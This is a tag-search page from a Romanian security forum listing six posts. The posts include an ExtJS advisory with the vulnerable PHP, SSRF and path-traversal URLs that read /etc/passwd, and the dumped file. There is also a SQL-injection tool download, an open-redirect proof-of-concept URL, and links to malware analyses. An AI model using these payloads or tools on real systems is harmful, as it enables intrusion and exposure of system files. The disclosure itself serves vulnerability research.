Jump to content

Search the Community

Showing results for tags 'read'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 6 results

  1. Hi all?? Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request internal http services File: /examples/feed-viewer/feed-proxy.php line:3-line:6 $feed = $_REQUEST['feed']; if($feed != '' && strpos($feed, 'http') === 0){ header('Content-Type: text/xml'); $xml = file_get_contents($feed); When we request like this url http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1 if the resource exist,we can get internal http services info ??strpos($feed, 'http') === 0?? we can request this url to bypass the restrictions achieve arbitrary file read http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd view the HTML source code root:x:0:0:Web-useast4 root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false landscape:x:103:108::/var/lib/landscape:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash ntp:x:105:111::/home/ntp:/bin/false snmp:x:106:112::/var/lib/snmp:/bin/false statd:x:107:65534::/var/lib/nfs:/bin/false postfix:x:108:114::/var/spool/postfix:/bin/false Submitter: zhanghao@Baidu X-team gaojianfeng@Baidu X-team shitong@Baidu X-team ________________________________ Id:Yaseng Hi: Hisengberg Team: Baidu X-team E-mail:gaojianfeng@baidu.com<mailto:gedongyu@baidu.com> [tips] Source: http://dl.packetstormsecurity.net/1505-exploits/extjs-disclose.txt
  2. SQLi Dumper v.7 - Tool to find bugs errors or vulnerabilities in MySQL database Functions SQL Injection Operation System Function Dump Database Extract Database Schema Search Columns Name Read File (read only) Create File (read only) Brute Table & Column http://www.4shared.com/rar/7grTslfQce/SQLi_Dumper_v71.html
  3. Summary: 1. Thanks for the sample file(s) 2. First view 3. Second view 4. More Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf
  4. Proof of Concept 1: http://www.mediafire.com/dynamic/ct.php?link=norm_header_up_btn&url=%2F%25%77%77%77% 2E%79%61%68%6F%6F%2E%63%6F%6D%20%20 Read more: http://dl.packetstormsecurity.net/1502-exploits/Mediafire.pdf
  5. This is a brief write up noting javascript backdoors left in common PHP shells. Read more: http://dl.packetstormsecurity.net/papers/general/backdoor.pdf
  6. " Decipher the unspoken vocabulary of body language. A tilt of the head, the crossing of legs, the buttoning and unbuttoning of a jacket, and other gestures can speak volumes about what a person is thinking or feeling. By learning to spot hidden emotional, social, and sexual messages, you can tell how a person is reacting to you, respond appropriately, andinfluence the outcome of any situation. Detect and send messages of friendliness and flirtation. Gain and maintain the upper hand in negotiations and arguments. Determine whether someone is lying, recognize boredom, and overcome defensiveness. By interpreting nonverbal behavior, you can improve your control over job interviews, business meetings, parties, chance encounters, and other everyday situations. " Am citit o buna parte din ea,si pot zice ca e bine structurata si contine informatii destul de utile pentru viata de zi cu zi dar si pentru un bun 'social engineer' download: how_to_read_a_person_like_a_book.pdf
×
×
  • Create New...